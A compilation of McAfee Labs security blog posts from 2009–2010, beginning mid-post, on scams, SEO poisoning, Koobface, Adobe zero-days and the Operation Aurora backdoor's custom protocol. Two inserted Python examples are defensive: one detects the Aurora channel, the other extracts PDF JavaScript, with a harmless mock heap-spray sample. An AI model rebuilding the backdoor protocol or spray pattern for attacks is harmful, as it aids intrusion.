Company N°7     > 30
Company N°8     > 30
Company N°9     > 30

Some companies work openly. Their managers are not afraid to create even LinkedIn profiles. When the pressure becomes too strong they simply create a new business.

To multiply sales, scareware companies recruit affiliates and promise them commissions reaching 75 percent of the product’s sales price.

When I presented our research on scareware in Paris in January, I explained that a colleague monitored the production servers of one of the main scareware companies during a six-month period. In 10 days, he counted more than four million downloads (that is, more than four million scareware infections)! This was from only one company, and some victims made more than one download in a day.

In 11 months, this scareware company received more than 4.5 million orders. Using this figure, I forecast annual revenues of greater than US$180 million. This leads to a substantial worldwide income for this criminal activity.

Finally, these scareware companies have not only fake security software for sale. They also peddle many other fake products (multimedia software, fitness software, family software, etc.). And, above all, they offer pornography. Consequently, their revenues are still greater.

To avoid becoming a security software scam victim, the McAfee Consumer Threat Alert advises the following:

  1. Before downloading any security software from the Web, get a recommendation from someone you trust who is savvy about Internet security software
  2. Investigate the company before purchasing the software
  3. Be careful when responding to pop-up ads
  4. You can protect your computer from these types of cybercrimes by installing a complete security software suite that includes anti-virus, anti-spyware, and firewall protection, such as McAfee Total Protection. Ensure that your software is always up to date (enable the “auto-update” feature) and perform regular scans.

Apple Announces iPad Availability: Watch Out for Scams!

Last week Apple formally announced the launch date for the Wi-Fi version of its much anticipated new tablet computer, the iPad. As with most events that generate a lot of media and consumer interest, this one also generated curiosity from the spammer community. They wonder how they can leverage this event to steal your sensitive information. 

Scams have already started to surface, claiming how you can win your own iPad for free. All you need to do is provide your address for shipment, and … Oh, yeah, to get your “free” iPad you also need to purchase something, which will require you to give us your credit card details. There had to be a catch somewhere.

Here is an example of such an email:

This scam is basically your typical “free offer” scam, but given the popularity and buzz surrounding any Apple product announcement, it’s essential to identify the legitimate from the “too good to be true.” As the release date for the iPad approaches, more scams such as this are likely to emerge, using email, social media technologies, and common search engine terms for delivery. 

Keep your eyes open, be diligent, and if you question whether any kind of offer you receive in email or on the web is legitimate, you should follow your instincts. Such offers are likely to be bogus.

Valentine’s Day Searches Lead to Malware

5, 4, 3, 2, 1…malware!

It’s like clockwork, ain’t it? A popular holiday, such as Valentine’s Day, approaches, and malware authors and cybercriminals ready for it.

I have done some Valentine’s Day searches for poisoned terms and found some nasty ones very quickly. Screensavers and ecards are always popular:

Valentine ScreenSavers

Valentine eCards

Even Rolex watches on Valentine’s Day are not safe:

Valentine Rolex

Some of the poisoned terms I have seen today:

Valentine’s Day Screensavers
Valentine’s Day Downloads
Valentine’s Day Wallpaper
Valentine’s Day Rolex
Valentine’s Day eCards
Animated Valentine’s Day
Valentine’s Day Greetings
Valentine’s Day Cupids
Valentine’s Day Gift Ideas

Make sure you surf safely with SiteAdvisor and keep that machine updated!

McAfee Labs Quarterly Threat Report Posted

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware, including fake security software, attacks on social networks, and AutoRun USB infections, continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats is evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat Reader.

A full copy of the Q4 2009 Threats Report is available here.

Scams Take Advantage of Haiti Relief Efforts

Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure used by the bad guys to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

President Barack Obama

On Tuesday, a catastrophic earthquake struck near Port-au-Prince, Haiti. The full extent of the damage is still being assessed, but the death toll — already in the thousands — is climbing fast.

This is the worst earthquake to hit the area in more than 200 years. Entire communities have been ripped apart and as many as 3 million people have been directly affected, including tens of thousands of American citizens who are in Haiti.

Our neighbors in Haiti are racing to confront the enormous devastation — and the OFA community can help.

Read down for more information about essential relief efforts and ways you can help today.

Footage is pouring in of homes collapsing, Haitians carrying injured family members, and hospitals being overrun in what was already the poorest nation in the Western Hemisphere.

I have directed my administration to respond with a swift, coordinated, and aggressive effort to save lives. Personnel from the United States and our partners in the international community are on the ground in damaged areas right now, working side by side with the Haitian people. They’re providing much-needed food, water, and sanitation supplies, saving lives and helping local communities start to rebuild.

Despite the fact that we are experiencing tough times here at home, I encourage those who can to reach out and help. It’s in times like these that we must show the kind of compassion and humanity that has defined the best of our national character for generations.

Read here to find out what you can do:

Obama In The United Kingdom

Help Haiti

Western Union Details

Name: XXXXXXXX

Country: United Kingdom

Call us On +XXXXXXXXXX
Any Funds given to the good people of America Here in The UK will be shared amongs Red Cross and all relief agencies.No amount is too small.

As this story continues to unfold, I hope you will continue to keep the people of Haiti in your thoughts and prayers, as well as the many Haitian-Americans who have done so much to enrich our country and who are worried about friends and loved ones in this time of need.

Thank you,

President Barack Obama

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

  • Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
  • Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
  • Don’t open attachments with donation forms, as they may be executable malware
  • Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.

McAfee ‘Hacking Exposed’ Webcast Series Fights Cybercrime

We are pleased to announce the next event in our complimentary monthly “Hacking Exposed Live!–A Webcast Series,” which educates attendees to protect against cybercrime and hackers. The monthly webcast, hosted by Hacking Exposed coauthor and McAfee Senior Vice President Stuart McClure, walks attendees through the latest hacking techniques and explains countermeasures for preventing attacks.

The next webcast is January 21 at 11 a.m. Pacific time (2 p.m. Eastern) and will feature two white-hot security topics: Botnets and Aurora, the zero-day vulnerability that last week struck Google and several other well-known companies. McAfee Worldwide Chief Technology Officer George Kurtz and McAfee Senior Director Greg Brown will join McClure to enlighten the audience on how hackers exploit these vulnerabilities and what can be done to prevent them from impacting businesses.

Based on the best-selling security book Hacking Exposed, this live monthly webcast gives attendees deep insights into current and evolving hacks and what they can do to keep their environments protected. The webcasts include everything attendees need to know to stay ahead of those who would cause harm. The sessions will also address the universe of hacks, involving social media, mobile, Unix, and more.

Click here to learn more and register today.

An Insight into the Aurora Communication Protocol

As we know, the recent Operation Aurora has been making waves due to a highly organized attack targeting companies such as Google, Adobe and other high profile companies. A security breach due to a vulnerability in Microsoft’s Internet Explorer, CVE-2010-0249, caused remote code execution leading to download of malware on compromised systems.

At McAfee Labs, researchers have been working around the clock across regions to delve deeper into the inner workings of this attack in an effort to educate and assist customers in its mitigation. In this blog we discuss the communication protocol being utilized by Aurora which depicts how organized and technical this attack is.

We also discuss the backdoor components of Aurora which would allow the hackers to take complete control of the victim’s machine. The backdoor components, which were dropped in the system by Roarur.dr after the successful exploitation by Exploit-Comele, are composed of several variants of Roarur.dll.

All samples used highly obfuscated code, with small pieces of code connected via jumps and calls, and separated by NOPs:

One thing in common between these DLL variants is the protocol used to communicate with the command & control server. Let’s take a look at how this protocol works.

After the initialization of the malware DLL, a connection is made to the command and control (C&C) server. The connection is made on port 443, which is usually used by the HTTPS protocol (HTTP encrypted with SSL). During analysis, we noticed that the protocol employed on this port was not the standard SSL protocol, but a custom encrypted protocol.

The backdoor client initiates the protocol by issuing a packet which always has the same first 20 bytes:

[ ff ff ff ff ff ff 00 00 fe ff ff ff ff ff ff ff ff ff 88 ff ]

After the initiator handshake, the protocol uses a 20 byte packet as header for all communication that follows. All data sent from client to server is encoded with a logical NOT, and all data received from server is XOR encoded with 0xCC. So the first reply from server would be:

[ CC CC CC CC CD CC CC CC CD CC CC CC CC CC CC CC XX XX XX XX ]

(where XX can represent any byte)
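The two fixed byte patterns and the two encodings described above are enough to build a simple channel detector. The following is an added example, not McAfee’s code and not the backdoor itself: it assumes that a sensor or pcap parser hands it the first payload bytes of each direction of a TCP flow to port 443 (the flow identifiers, machine name and TLS record bytes below are constructed for the example). It classifies a flow as a genuine TLS session (which always opens with a 0x16 0x03 handshake record), as the Aurora backdoor channel (which opens with the fixed 20-byte client hello instead), or as unknown, and it decodes the NOT-encoded client bytes and the 0xCC-XOR-encoded server bytes for analyst review.

```python
"""Detection and decoding helper for the custom Aurora backdoor channel.

Added example (not McAfee's code and not the backdoor). It assumes the bytes
handed to it are the first payload bytes of each direction of a TCP flow on
port 443, as a sensor or pcap parser would extract them. All sample flows
below are constructed for the example, not captured traffic.
"""

HEADER_LEN = 20
SERVER_XOR_KEY = 0xCC

# The fixed 20 bytes with which the backdoor client opens every session (from the post).
AURORA_CLIENT_HELLO = bytes.fromhex("ffffffffffff0000feffffffffffffffffff88ff")

# The fixed 16-byte prefix of the server's first reply; the last 4 bytes vary ("XX" in the post).
AURORA_SERVER_REPLY_PREFIX = bytes.fromhex("cccccccccdcccccccdcccccccccccccc")


def decode_client(data: bytes) -> bytes:
    """Client-to-server bytes are encoded with a logical NOT (bitwise complement).
    NOT is its own inverse, so the same function also encodes."""
    return bytes((~b) & 0xFF for b in data)


def decode_server(data: bytes) -> bytes:
    """Server-to-client bytes are XOR-encoded with 0xCC (also its own inverse)."""
    return bytes(b ^ SERVER_XOR_KEY for b in data)


def looks_like_tls(first_bytes: bytes) -> bool:
    """A genuine TLS session on 443 starts with a handshake record:
    content type 0x16 followed by the 0x03 major version byte."""
    return len(first_bytes) >= 2 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03


def classify_flow(client_first: bytes, server_first: bytes) -> str:
    """Return 'aurora-backdoor', 'tls' or 'unknown' for one port-443 flow."""
    if client_first[:HEADER_LEN] == AURORA_CLIENT_HELLO:
        return "aurora-backdoor"
    if looks_like_tls(client_first) and looks_like_tls(server_first):
        return "tls"
    return "unknown"


def server_reply_matches(server_first: bytes) -> bool:
    """Secondary check: does the server's first packet have the expected reply shape?"""
    return server_first[:16] == AURORA_SERVER_REPLY_PREFIX


def extract_client_tail(client_first: bytes) -> bytes:
    """Decode whatever the client sent after the 20-byte hello (NOT-encoded)."""
    return decode_client(client_first[HEADER_LEN:])


def scan_flows(flows: dict) -> dict:
    """flows: {flow_id: (client_first_bytes, server_first_bytes)} -> {flow_id: verdict}."""
    return {fid: classify_flow(c, s) for fid, (c, s) in flows.items()}


# --- constructed sample data (not captured traffic) ---
# Start of a normal TLS ClientHello / ServerHello record.
TLS_CLIENT = bytes.fromhex("160301004b0100004703034c") + b"\x00" * 8
TLS_SERVER = bytes.fromhex("16030300420200003e0303") + b"\x00" * 8
# An Aurora-style session: the fixed hello, then a NOT-encoded machine name
# (the layout of the data after the hello is assumed here for illustration).
AURORA_CLIENT = AURORA_CLIENT_HELLO + decode_client(b"WORKSTATION-07")
AURORA_SERVER = AURORA_SERVER_REPLY_PREFIX + bytes.fromhex("a1b2c3d4")

SAMPLE_FLOWS = {
    "10.0.0.5:52311->203.0.113.9:443": (TLS_CLIENT, TLS_SERVER),
    "10.0.0.8:49152->198.51.100.2:443": (AURORA_CLIENT, AURORA_SERVER),
}

if __name__ == "__main__":
    for fid, verdict in scan_flows(SAMPLE_FLOWS).items():
        print(fid, verdict)
        if verdict == "aurora-backdoor":
            c, s = SAMPLE_FLOWS[fid]
            print("  server reply shape ok:", server_reply_matches(s))
            print("  decoded client tail:", extract_client_tail(c))
            print("  decoded server header:", decode_server(s[:HEADER_LEN]).hex())
```

The key design point is that the check keys on the first bytes of the flow rather than on the port: a real HTTPS connection is recognizable from its TLS record header, so anything on port 443 that starts with 0xFF instead of 0x16 0x03 deserves a second look even before the full 20-byte hello is matched. Decoding the fixed hello with NOT and the fixed reply prefix with XOR 0xCC also shows that both sides exchange mostly-zero 20-byte headers, which is consistent with the post’s description of a 20-byte header preceding every message.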

The handshake is followed by information gathering. The backdoor gathers the following information from the victim’s machine and sends it back to the server:

  • Content of HARDWARE\DESCRIPTION\System\CentralProcessor\MHz registry key
  • Service pack name
  • Machine name
  • OS Version

At the time the operation was made public by Google, the control servers were offline, hence we don’t have access to the actual communication. However after understanding the protocol and the expected commands at the client end, we were able to set up a fake environment allowing us to initiate commands to the client. In this way we were able to force the malware to behave in a way we requested.

Based on this, we found that the structure of the header is the following:

Commands can have any value between 0x02 and 0x14, which gives the hacker 18 possible commands. But these commands can be extended by the use of the parameters, which change the behavior of the command executed:

One interesting note on the protocol is the fact that each client uses a different encryption key to obfuscate the data sent to the server. The client calls GetTickCount() to generate a random encryption key, which is sent as part of the header in the outgoing packet. This key is used to encrypt the data between client and server afterwards. Indeed an interesting approach.

The “extra data” part of the packet can contain any information the hacker wants. Based on the commands executed, this could be which drives/files the user has on the system, information to install a new service, or even a file to drop on the system.

The transmission of this extra data is made in two steps:

  • The backdoor receives the header, decrypts it with XOR 0xCC, and gets the command
  • The command is executed
  • Based on the command, if there is extra data to receive, it gets the extra data size and checks that the encryption key is the same as the one sent before
  • It applies an XOR 0xCC decryption to the extra data
  • It decrypts the result with the given encryption key

We believe this is how the file Acelpvc.dll was dropped on the system. This is another backdoor component which can be installed as a service and receive two parameters: IP and port.

Acelpvc.dll, once loaded, opens a connection to this server:port using the same encrypted protocol. This way, the hackers could make the victim’s computer connect to another server and guarantee their access to the system even if their original connection is cut.

As you can see, this attack involved very advanced methods, with several pieces of malware working in concert to give the attackers full control of the infected system, while at the same time disguising the traffic as a common connection to a secure website. This way the attackers were able to covertly gather all the information they wanted without being discovered.

Hopefully this brief will provide users with a good basic understanding of the custom backdoor protocol used during Operation Aurora. Stay tuned for more information on Aurora as McAfee dissects it  :)

Update Jan 19, 2010 (product coverage update)
McAfee Network Security Platform: The UDS release of January 19 contains the signature “UDS-BACKDOOR: Operation Aurora Channel Detected” to detect this backdoor.

McAfee Labs’ January Spam Report

Angelina Jolie and Barack Obama are the #1 celeb subjects of choice for spammers, according to our January Spam Report. The report also reveals:

  • The top 25 men and women that were spammed
  • Chinese pharma spam isn’t going away; in fact, on Dec 14, spam levels skyrocketed with subject lines advertising discounts on Pfizer drugs
  • “Free-hosting” websites, used to provide spam URLs, have become a major target for spammers

Be mindful of those celebrity names that appear in your inbox! Download the full report here.

Dragons Everywhere: The 26th Chaos Communication Congress, Part 2

Day 2 and Night 2 of the 26th Chaos Communication Congress is over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (“data retention”). CCC-spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix “FX” Lindner changed sides: In a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released Blitzableiter (“lightning rod”), a tool for sandboxing .swf files to prevent a class of Flash exploits. His tool is still work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you. ;)

2010 Predictions: the Year of a Major Social Networking Security Breach?

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly and TinyURL links. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask malicious sites and direct users to them.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

  • Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
  • Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
  • Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
  • HTML 5 and the evolution of the language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertently left off the document. Thanks, Pedro!)

(Not So) Happy Holidays from Koobface

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity consists of contacting compromised servers to obtain the addresses of more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now serving a different purpose.

Holiday Koobface Greetings

When users go to these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Spread of Koobface Holiday Cheer

Stay updated and safe over the holidays!

Hacker’s Holiday: a Viral Video!

Ketchup stains. Klingons. Exploding monitors. They’re all part of our fiendishly clever new music video, “Hacker’s Holiday.” Pity poor Tiny Tim. He gets a shiny new PC for Christmas and doesn’t bother to protect it. Well, you can guess the rest. A few short days later (12 days maybe?) his PC is ready for the ashcan of history. But how will Tiny Tim exact his revenge? Watch and learn:

And yeah, that’s one guy doing all the sounds, all the singing, all the work. Mister Tim, also star of Enter Kazoo Man and the composer of Star Wars (John Williams is the Man) wrote this little ditty with our help.

If you like it, star it and share it. Thanks! And Happy Holidays from McAfee.

Check Your Friends! Facebook IMs May Lead To Trouble

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it, I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

Colon Cleanse IM

This led to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

Colon Cleanse Website

In short order I also received two more IMs. The first was a video (sound familiar???):

Facebook Video IM

This led to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

FaceBook Phishing Page

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

TrustedSource Rep Page

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

Christmas IM Scam

This led to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

Fake Watch Site

I contacted my friend (who was certainly NOT sending the IMs knowingly) and got them fixed up pretty quickly. Not surprisingly, it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Brittany Murphy Searching Dangers

Sadly, actress Brittany Murphy passed away over the weekend. With her unfortunate passing will come the inevitable web searches that lead Internet users to some potentially unsafe sites. This has been a well established trend throughout 2009. It is a sad reflection that malware authors and scammers will use these events as lures to distribute their warez and site links.

Over the weekend I first started seeing tweets relating to Brittany Murphy and began capturing images and running some searches. Very quickly these led to the expected results:

Brittany Murphy SA Result

The SiteAdvisor warning page on it is pretty clear on its intentions:

Brittany Murphy SiteAdvisor Warning Page

Some of the search phrases that are yielding very questionable results are:

Brittany Murphy dies
Brittany Murphy dead
Brittany Murphy husband
Brittany Murphy death hoax
Ashton Kutcher Brittany Murphy
Brittany Murphy 8 mile
Brittany Murphy luanne

Some of these had more than half the results on the first Google search page as flagged yellow or red by our SiteAdvisor technology.

The bad guys have been using celebrity deaths and natural disasters as a successful lure for most of this year. The words “Brittany” and “Murphy” along with related event words are trending very high in Google Trends and Tweetcloud currently. This means the bad guys will be using it as a lure because users are already searching for information on the subject. Make sure you are aware of the trend and stay one step ahead of them! Use SiteAdvisor and search safely!!

Another Adobe Reader Zero-Day Attack

Adobe just posted a new Security Advisory (APSA09-07, CVE-2009-4324) for the latest critical vulnerability in Adobe Reader and Acrobat 9.2 (and earlier). The flaw lies within a JavaScript function specific to the PDF Reader. Adobe plans to release a patch by January 12, 2010, to resolve the issue. The zero-day is already being exploited in targeted attacks. A Twitter post indicates that an exploit module has been added to the Metasploit framework as well, so it is only a matter of days until this exploit becomes widespread, as the various exploit toolkits are “enhanced” with support for this latest vulnerability.

The screenshot below illustrates the inner workings of one such malicious PDF file, showing the JavaScript obfuscation layer on top of the actual exploit code.

McAfee FileInsight screenshot

McAfee customers are protected through the DATs (as “Exploit-PDF.ag” in 5834) and through Gateway Anti-Malware (“BehavesLike.PDF.Suspicious.Z”). If you don’t really need JavaScript in PDF documents (and if you do, please leave a comment on this blog–we’re curious to know), you can mitigate this issue until the patch is available next year by disabling JavaScript in Adobe Reader and Acrobat as described in the Adobe Security Advisory.
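The obfuscation layer in the screenshot is what a responder has to peel off before the exploit can be read or signatured. As an added example (not code from the original post, and not McAfee FileInsight), here is a minimal PDF JavaScript extractor: it inflates FlateDecode streams, follows /JS and /JavaScript entries whether they hold a literal string, a hex string or an indirect object reference, and flags the usual obfuscation primitives (unescape, eval, String.fromCharCode, long %u-encoded runs). The sample PDF is constructed in the block around a harmless stand-in script; nothing in it is the actual CVE-2009-4324 exploit, and the object layout is illustrative.

```python
import re
import zlib

# Obfuscation primitives commonly layered over PDF exploit code
OBFUSCATION_MARKERS = ("unescape(", "eval(", "String.fromCharCode")
STRING_TOKEN = rb"\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>"          # literal or hex string
JS_ENTRY = re.compile(rb"/(?:JS|JavaScript)\s*(" + STRING_TOKEN + rb"|\d+\s+\d+\s+R)", re.DOTALL)
STREAM = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)


def pdf_unescape_literal(raw: bytes) -> bytes:
    """Decode the body of a PDF literal string (the part between the parentheses)."""
    simple = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
              b"(": b"(", b")": b")", b"\\": b"\\"}
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i:i + 1] == b"\\" and i + 1 < len(raw):
            nxt = raw[i + 1:i + 2]
            if nxt in simple:
                out += simple[nxt]
                i += 2
                continue
            m = re.match(rb"[0-7]{1,3}", raw[i + 1:i + 4])   # \ddd octal escape
            if m:
                out.append(int(m.group(0), 8) & 0xFF)
                i += 1 + len(m.group(0))
                continue
            i += 1                                           # lone backslash: drop it
            continue
        out += raw[i:i + 1]
        i += 1
    return bytes(out)


def inflate_streams(data: bytes) -> bytes:
    """Return the file with every FlateDecode stream replaced by its inflated content."""
    out, pos = bytearray(), 0
    for m in STREAM.finditer(data):
        head = data[max(0, data.rfind(b" obj", 0, m.start())):m.start()]  # the stream's dict
        body = m.group(1)
        if b"/FlateDecode" in head:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass                                         # keep undecodable data as is
        out += data[pos:m.start()] + b"stream\n" + body + b"\nendstream"
        pos = m.end()
    out += data[pos:]
    return bytes(out)


def decode_string(tok: bytes) -> bytes:
    """Decode a (literal) or <hex> PDF string token to raw bytes."""
    if tok.startswith(b"("):
        return pdf_unescape_literal(tok[1:-1])
    digits = re.sub(rb"\s", b"", tok[1:-1])
    if len(digits) % 2:
        digits += b"0"                                       # PDF pads an odd final digit
    return bytes.fromhex(digits.decode())


def object_body(data: bytes, num: int, gen: int) -> bytes:
    m = re.search(rb"(?<![0-9])%d\s+%d\s+obj(.*?)endobj" % (num, gen), data, re.DOTALL)
    return m.group(1) if m else b""


def extract_javascript(pdf: bytes) -> list:
    """Every script reachable through a /JS or /JavaScript entry, as text."""
    data = inflate_streams(pdf)
    scripts = []
    for m in JS_ENTRY.finditer(data):
        tok = m.group(1)
        if tok.endswith(b"R"):                               # indirect reference: n g R
            num, gen = (int(x) for x in tok.split()[:2])
            body = object_body(data, num, gen)
            s = STREAM.search(body)
            if s:
                js = s.group(1)                              # script lives in a stream
            else:
                t = re.search(STRING_TOKEN, body, re.DOTALL)
                js = decode_string(t.group(0)) if t else b""
        else:
            js = decode_string(tok)                          # inline string
        if js:
            scripts.append(js.decode("latin-1"))
    return scripts


def obfuscation_indicators(js: str) -> list:
    found = [mk for mk in OBFUSCATION_MARKERS if mk in js]
    if re.search(r"(?:%u[0-9a-fA-F]{4}){8,}|(?:\\x[0-9a-fA-F]{2}){8,}", js):
        found.append("long encoded byte run")                # typical sled/shellcode carrier
    return found


# Constructed sample: the layout of a malicious PDF with its script in a compressed
# stream. The JavaScript is a harmless stand-in, not the exploit for CVE-2009-4324.
SAMPLE_JS = (b"var sled = unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090');\n"
             b"var spray = []; for (var i = 0; i < 200; i++) spray[i] = sled;\n"
             b"eval(String.fromCharCode(97,112,112,46,97,108,101,114,116,40,49,41));\n")


def build_sample_pdf() -> bytes:
    packed = zlib.compress(SAMPLE_JS)
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /OpenAction << /S /JavaScript /JS 2 0 R >> >> endobj\n"
            + b"2 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed)
            + packed + b"\nendstream\nendobj\n"
            b"3 0 obj << /S /JavaScript /JS (app.alert\\(1\\)) >> endobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for n, js in enumerate(extract_javascript(build_sample_pdf())):
        print(f"script {n}: indicators={obfuscation_indicators(js)}\n{js}")
```

The extractor deliberately stays on the raw bytes rather than using a full PDF parser: malicious files are often malformed on purpose so that a strict parser gives up before reaching the script. It does not follow object streams (/ObjStm) or the other filters (ASCIIHex, LZW, RunLength), so an empty result is not a clean bill of health; run it as a first pass and fall back to FileInsight or a similar tool when a file has /JavaScript entries it cannot resolve.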

Good News from China

As outlined in our recent report Mapping the Mal Web, the People’s Republic of China’s top-level domain (.cn) is currently one of the riskiest top-level domains to surf due to numerous malware downloads and other risky sites. However, this state of affairs may now change for the better:

On December 11 the China Internet Network Information Center (CNNIC), the state network information center of China, released an update regarding its auditing of domain name registrations. As of today, domain name applicants must submit a formal paper-based application when making an online application to the registrar. This includes the original application form with business seal, the company business license, and a photocopy of the applicant’s ID.

This change will make the .cn domain very unattractive for criminals and fraudsters who are looking for domains they can register anonymously, preferably paying with stolen credit card information. This would be a great step in making the domain name space of .cn a safer place. And if these measures are implemented as announced, it would in fact make China a leading example in the fight against fraudsters on the Internet.

I do hope that one small part of the announcement suffered just a bit in translation:

“3. From the day of the submission of online application, if CNNIC does not receive the formal paper-based application material within 5 days or the application material auditing is not qualified, the domain name to be applied will be deleted.”

I hope this means the application, not the domain, will be deleted after being in service for just five days. If not, this has the potential to become “Domain Tasting 2.0.”

McAfee Labs Releases December Spam Report

